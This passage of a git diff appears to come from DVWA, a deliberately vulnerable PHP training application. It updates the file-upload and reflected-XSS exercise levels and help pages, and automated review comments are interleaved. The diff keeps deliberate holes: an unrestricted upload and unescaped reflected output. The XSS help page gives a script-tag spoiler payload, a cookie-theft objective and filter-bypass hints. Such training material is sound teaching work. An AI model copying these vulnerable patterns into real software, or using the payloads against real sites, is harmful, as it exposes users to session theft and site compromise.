     	if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
     		( $uploaded_size < 100000 ) &&
     		( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
     		getimagesize( $uploaded_tmp ) ) {
     
    -		// Strip any metadata (using Imagick is recommended over GD)
    -		if ( $uploaded_type == 'image/jpeg' ) {
    +		// Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
    +		if( $uploaded_type == 'image/jpeg' ) {
     			$img = imagecreatefromjpeg( $uploaded_tmp );
     			imagejpeg( $img, $temp_file, 100);
     		}
     		else {
     			$img = imagecreatefrompng( $uploaded_tmp );
     			imagepng( $img, $temp_file, 9);
    -
     		}
     		imagedestroy( $img );
     
    -		// Move the file to the web root from the temp folder
    -		if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ){
    -			$html .= "${target_file} succesfully uploaded!";
    +		// Can we move the file to the web root from the temp folder?
    +		if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
    +			// Yes!
    +			$html .= "
    ${target_file} succesfully uploaded!
    "; } - else{ - $html .= 'Your image was not uploaded.'; + else { + // No + $html .= '
    Your image was not uploaded.
    '; } // Delete any temp files - if ( file_exists( $temp_file ) ) + if( file_exists( $temp_file ) ) unlink( $temp_file ); } else { - $html .= 'Your image was not uploaded. We only accept JPEG or PNG images.'; + // Invalid file + $html .= '
    Your image was not uploaded. We can only accept JPEG or PNG images.
    '; } - $html .= '
    '; } // Generate Anti-CSRF token diff --git a/vulnerabilities/upload/source/low.php b/vulnerabilities/upload/source/low.php index 953fc7cce..904403b21 100644 --- a/vulnerabilities/upload/source/low.php +++ b/vulnerabilities/upload/source/low.php @@ -1,17 +1,19 @@ '; - if(!move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { - $html .= 'Your image was not uploaded.'; + // Can we move the file to the upload folder? + if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { + // No + $html .= '
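Review bot: `"${target_file} succesfully uploaded!"` uses the `${var}` interpolation form, which is deprecated from PHP 8.2; `{$target_file}` is the supported form and is what the low, medium and high upload sources use in this same commit, and the same `${name}` form is introduced in vulnerabilities/xss_r/source/high.php and impossible.php. Separately, the re-encode branch passes `$img` to `imagejpeg()` / `imagepng()` without checking that `imagecreatefromjpeg()` / `imagecreatefrompng()` succeeded; a malformed file that passes `getimagesize()` then produces a warning (or a TypeError on PHP 8) instead of the "not uploaded" message, so `if( $img === false )` before re-encoding should route it to the error path. The enclosing `if` on the anti-CSRF check starts above the hunk.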
    Your image was not uploaded.
    '; } else { - $html .= $target_path . ' succesfully uploaded!'; + // Yes! + $html .= "
    {$target_path} succesfully uploaded!
    "; } - $html .= ''; } ?> diff --git a/vulnerabilities/upload/source/medium.php b/vulnerabilities/upload/source/medium.php index 02529ae80..66f3bc8f2 100644 --- a/vulnerabilities/upload/source/medium.php +++ b/vulnerabilities/upload/source/medium.php @@ -1,27 +1,33 @@ '; + // Is it an image? if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) ) { - if(!move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { - $html .= 'Your image was not uploaded.'; + // Can we move the file to the upload folder? + if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { + // No + $html .= '
    Your image was not uploaded.
    '; } else { - $html .= $target_path . ' succesfully uploaded!'; + // Yes! + $html .= "
    {$target_path} succesfully uploaded!
    "; } } else { - $html .= 'Your image was not uploaded. We only accept JPEG or PNG images.'; + // Invalid file + $html .= '
    Your image was not uploaded. We can only accept JPEG or PNG images.
    '; } - $html .= ''; } ?> diff --git a/vulnerabilities/view_help.php b/vulnerabilities/view_help.php index 936e2b4a3..2a6e14188 100644 --- a/vulnerabilities/view_help.php +++ b/vulnerabilities/view_help.php @@ -1,23 +1,25 @@ ' . file_get_contents( DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/{$id}/help/help.php" ) . ' {$help} -
    -"; +\n"; dvwaHelpHtmlEcho( $page ); diff --git a/vulnerabilities/view_source.php b/vulnerabilities/view_source.php index af03b1a8c..aea076ad3 100644 --- a/vulnerabilities/view_source.php +++ b/vulnerabilities/view_source.php @@ -1,12 +1,12 @@ - +
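Review bot: `file_get_contents( DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/{$id}/help/help.php" )` builds a filesystem path from `$id`; the assignment of `$id` is above the hunk and not visible, but if it comes from the request it needs to be checked against a fixed allow-list of module directory names before it reaches the path, since this is core viewer code rather than one of the training levels. If that validation already happens upstream, a one-line comment at this call saying so, e.g. `// $id is restricted to known module names before use`, would let a reader confirm it without opening the rest of the file.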
    ".highlight_string( $source, true )."
    " . highlight_string( $source, true ) . "
    @@ -62,8 +62,7 @@ - -"; +\n"; dvwaSourceHtmlEcho( $page ); diff --git a/vulnerabilities/view_source_all.php b/vulnerabilities/view_source_all.php index 816573af9..9ce248468 100644 --- a/vulnerabilities/view_source_all.php +++ b/vulnerabilities/view_source_all.php @@ -1,12 +1,12 @@ - -"; +\n"; dvwaSourceHtmlEcho( $page ); diff --git a/vulnerabilities/xss_r/help/help.php b/vulnerabilities/xss_r/help/help.php index a3565be66..ffb38400c 100644 --- a/vulnerabilities/xss_r/help/help.php +++ b/vulnerabilities/xss_r/help/help.php @@ -1,19 +1,50 @@
    -

    Help - Cross Site Scripting (XSS)

    +

    Help - Cross Site Scripting (Reflected)

    -

    Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. - Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. - Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

    +

    About

    +

    "Cross-Site Scripting (XSS)" attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. + XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, + to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application using input from a user in the output, + without validating or encoding it.

    -

    An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. - Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with - that site. These scripts can even rewrite the content of the HTML page.

    +

    An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, + and will execute the JavaScript. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other + sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page.

    -

    Example: http://127.0.0.1/dvwa/xss.php?name=javascript

    +

    Because its a reflected XSS, the malicious code is not stored in the remote web application, so requires some social engineering (such as a link via email/chat).

    + +


    + +

    Objective

    +

    One way or another, steal the cookie of a logged in user.

    + +


    + +

    Low Level

    +

    Low level will not check the requested input, before including it to be used in the output text.

    +
    Spoiler: ?name=<script>alert("XSS");</script>.
    + +
    + +

    Medium Level

    +

    The developer has tried to add a simple pattern matching to remove any references to "<script>", to disable any JavaScript.

    +
    Spoiler: Its cAse sENSiTiVE.
    + +
    + +

    High Level

    +

    The developer now believes they can disable all JavaScript by removing the pattern "<s*c*r*i*p*t".

    +
    Spoiler: HTML events.
    + +
    + +

    Impossible Level

    +

    Using inbuilt PHP functions (such as ""), + its possible to escape any values which would alter the behaviour of the input.

    @@ -22,5 +53,5 @@
    -

    Reference: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

    +

    Reference:

    diff --git a/vulnerabilities/xss_r/index.php b/vulnerabilities/xss_r/index.php index cc5697d64..25686ef16 100644 --- a/vulnerabilities/xss_r/index.php +++ b/vulnerabilities/xss_r/index.php @@ -1,12 +1,12 @@ @@ -41,8 +41,7 @@ What's your name? -

    -"; +

    \n"; if( $vulnerabilityFile == 'impossible.php' ) $page[ 'body' ] .= " " . tokenField(); @@ -54,14 +53,13 @@

    More Information

    -
    -"; +\n"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/xss_r/source/high.php b/vulnerabilities/xss_r/source/high.php index ae88f9853..be918c3b5 100644 --- a/vulnerabilities/xss_r/source/high.php +++ b/vulnerabilities/xss_r/source/high.php @@ -1,9 +1,12 @@ '; - $html .= 'Hello ' . preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); - $html .= ''; + // Get input + $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); + + // Feedback for end user + $html .= "
    Hello ${name}
    "; } ?> diff --git a/vulnerabilities/xss_r/source/impossible.php b/vulnerabilities/xss_r/source/impossible.php index fe4f09374..2651802e3 100644 --- a/vulnerabilities/xss_r/source/impossible.php +++ b/vulnerabilities/xss_r/source/impossible.php @@ -1,12 +1,15 @@ '; - $html .= 'Hello ' . htmlspecialchars( $_GET[ 'name' ] ); - $html .= ''; + // Get input + $name = htmlspecialchars( $_GET[ 'name' ] ); + + // Feedback for end user + $html .= "
    Hello ${name}
    "; } // Generate Anti-CSRF token diff --git a/vulnerabilities/xss_r/source/low.php b/vulnerabilities/xss_r/source/low.php index dafdc9652..3c72d3782 100644 --- a/vulnerabilities/xss_r/source/low.php +++ b/vulnerabilities/xss_r/source/low.php @@ -1,9 +1,9 @@ '; - $html .= 'Hello ' . $_GET[ 'name' ]; - $html .= ''; + // Feedback for end user + $html .= '
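Review bot: `htmlspecialchars( $_GET[ 'name' ] )` relies on the default flags and charset, so on PHP versions before 8.1 single quotes are left unencoded and the encoding follows `default_charset`. For the level meant to be the reference-correct one, pass the context explicitly: `$name = htmlspecialchars( $_GET[ 'name' ], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );`. In the current plain-text body context the omission is not exploitable, but this is the example learners copy, and the `${name}` interpolation on the next line is the form deprecated in PHP 8.2 (`{$name}` is the supported one).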
    Hello ' . $_GET[ 'name' ] . '
    '; } ?> diff --git a/vulnerabilities/xss_r/source/medium.php b/vulnerabilities/xss_r/source/medium.php index 19369a63f..38bc4a9ca 100644 --- a/vulnerabilities/xss_r/source/medium.php +++ b/vulnerabilities/xss_r/source/medium.php @@ -1,9 +1,12 @@ '; - $html .= 'Hello ' . str_replace( '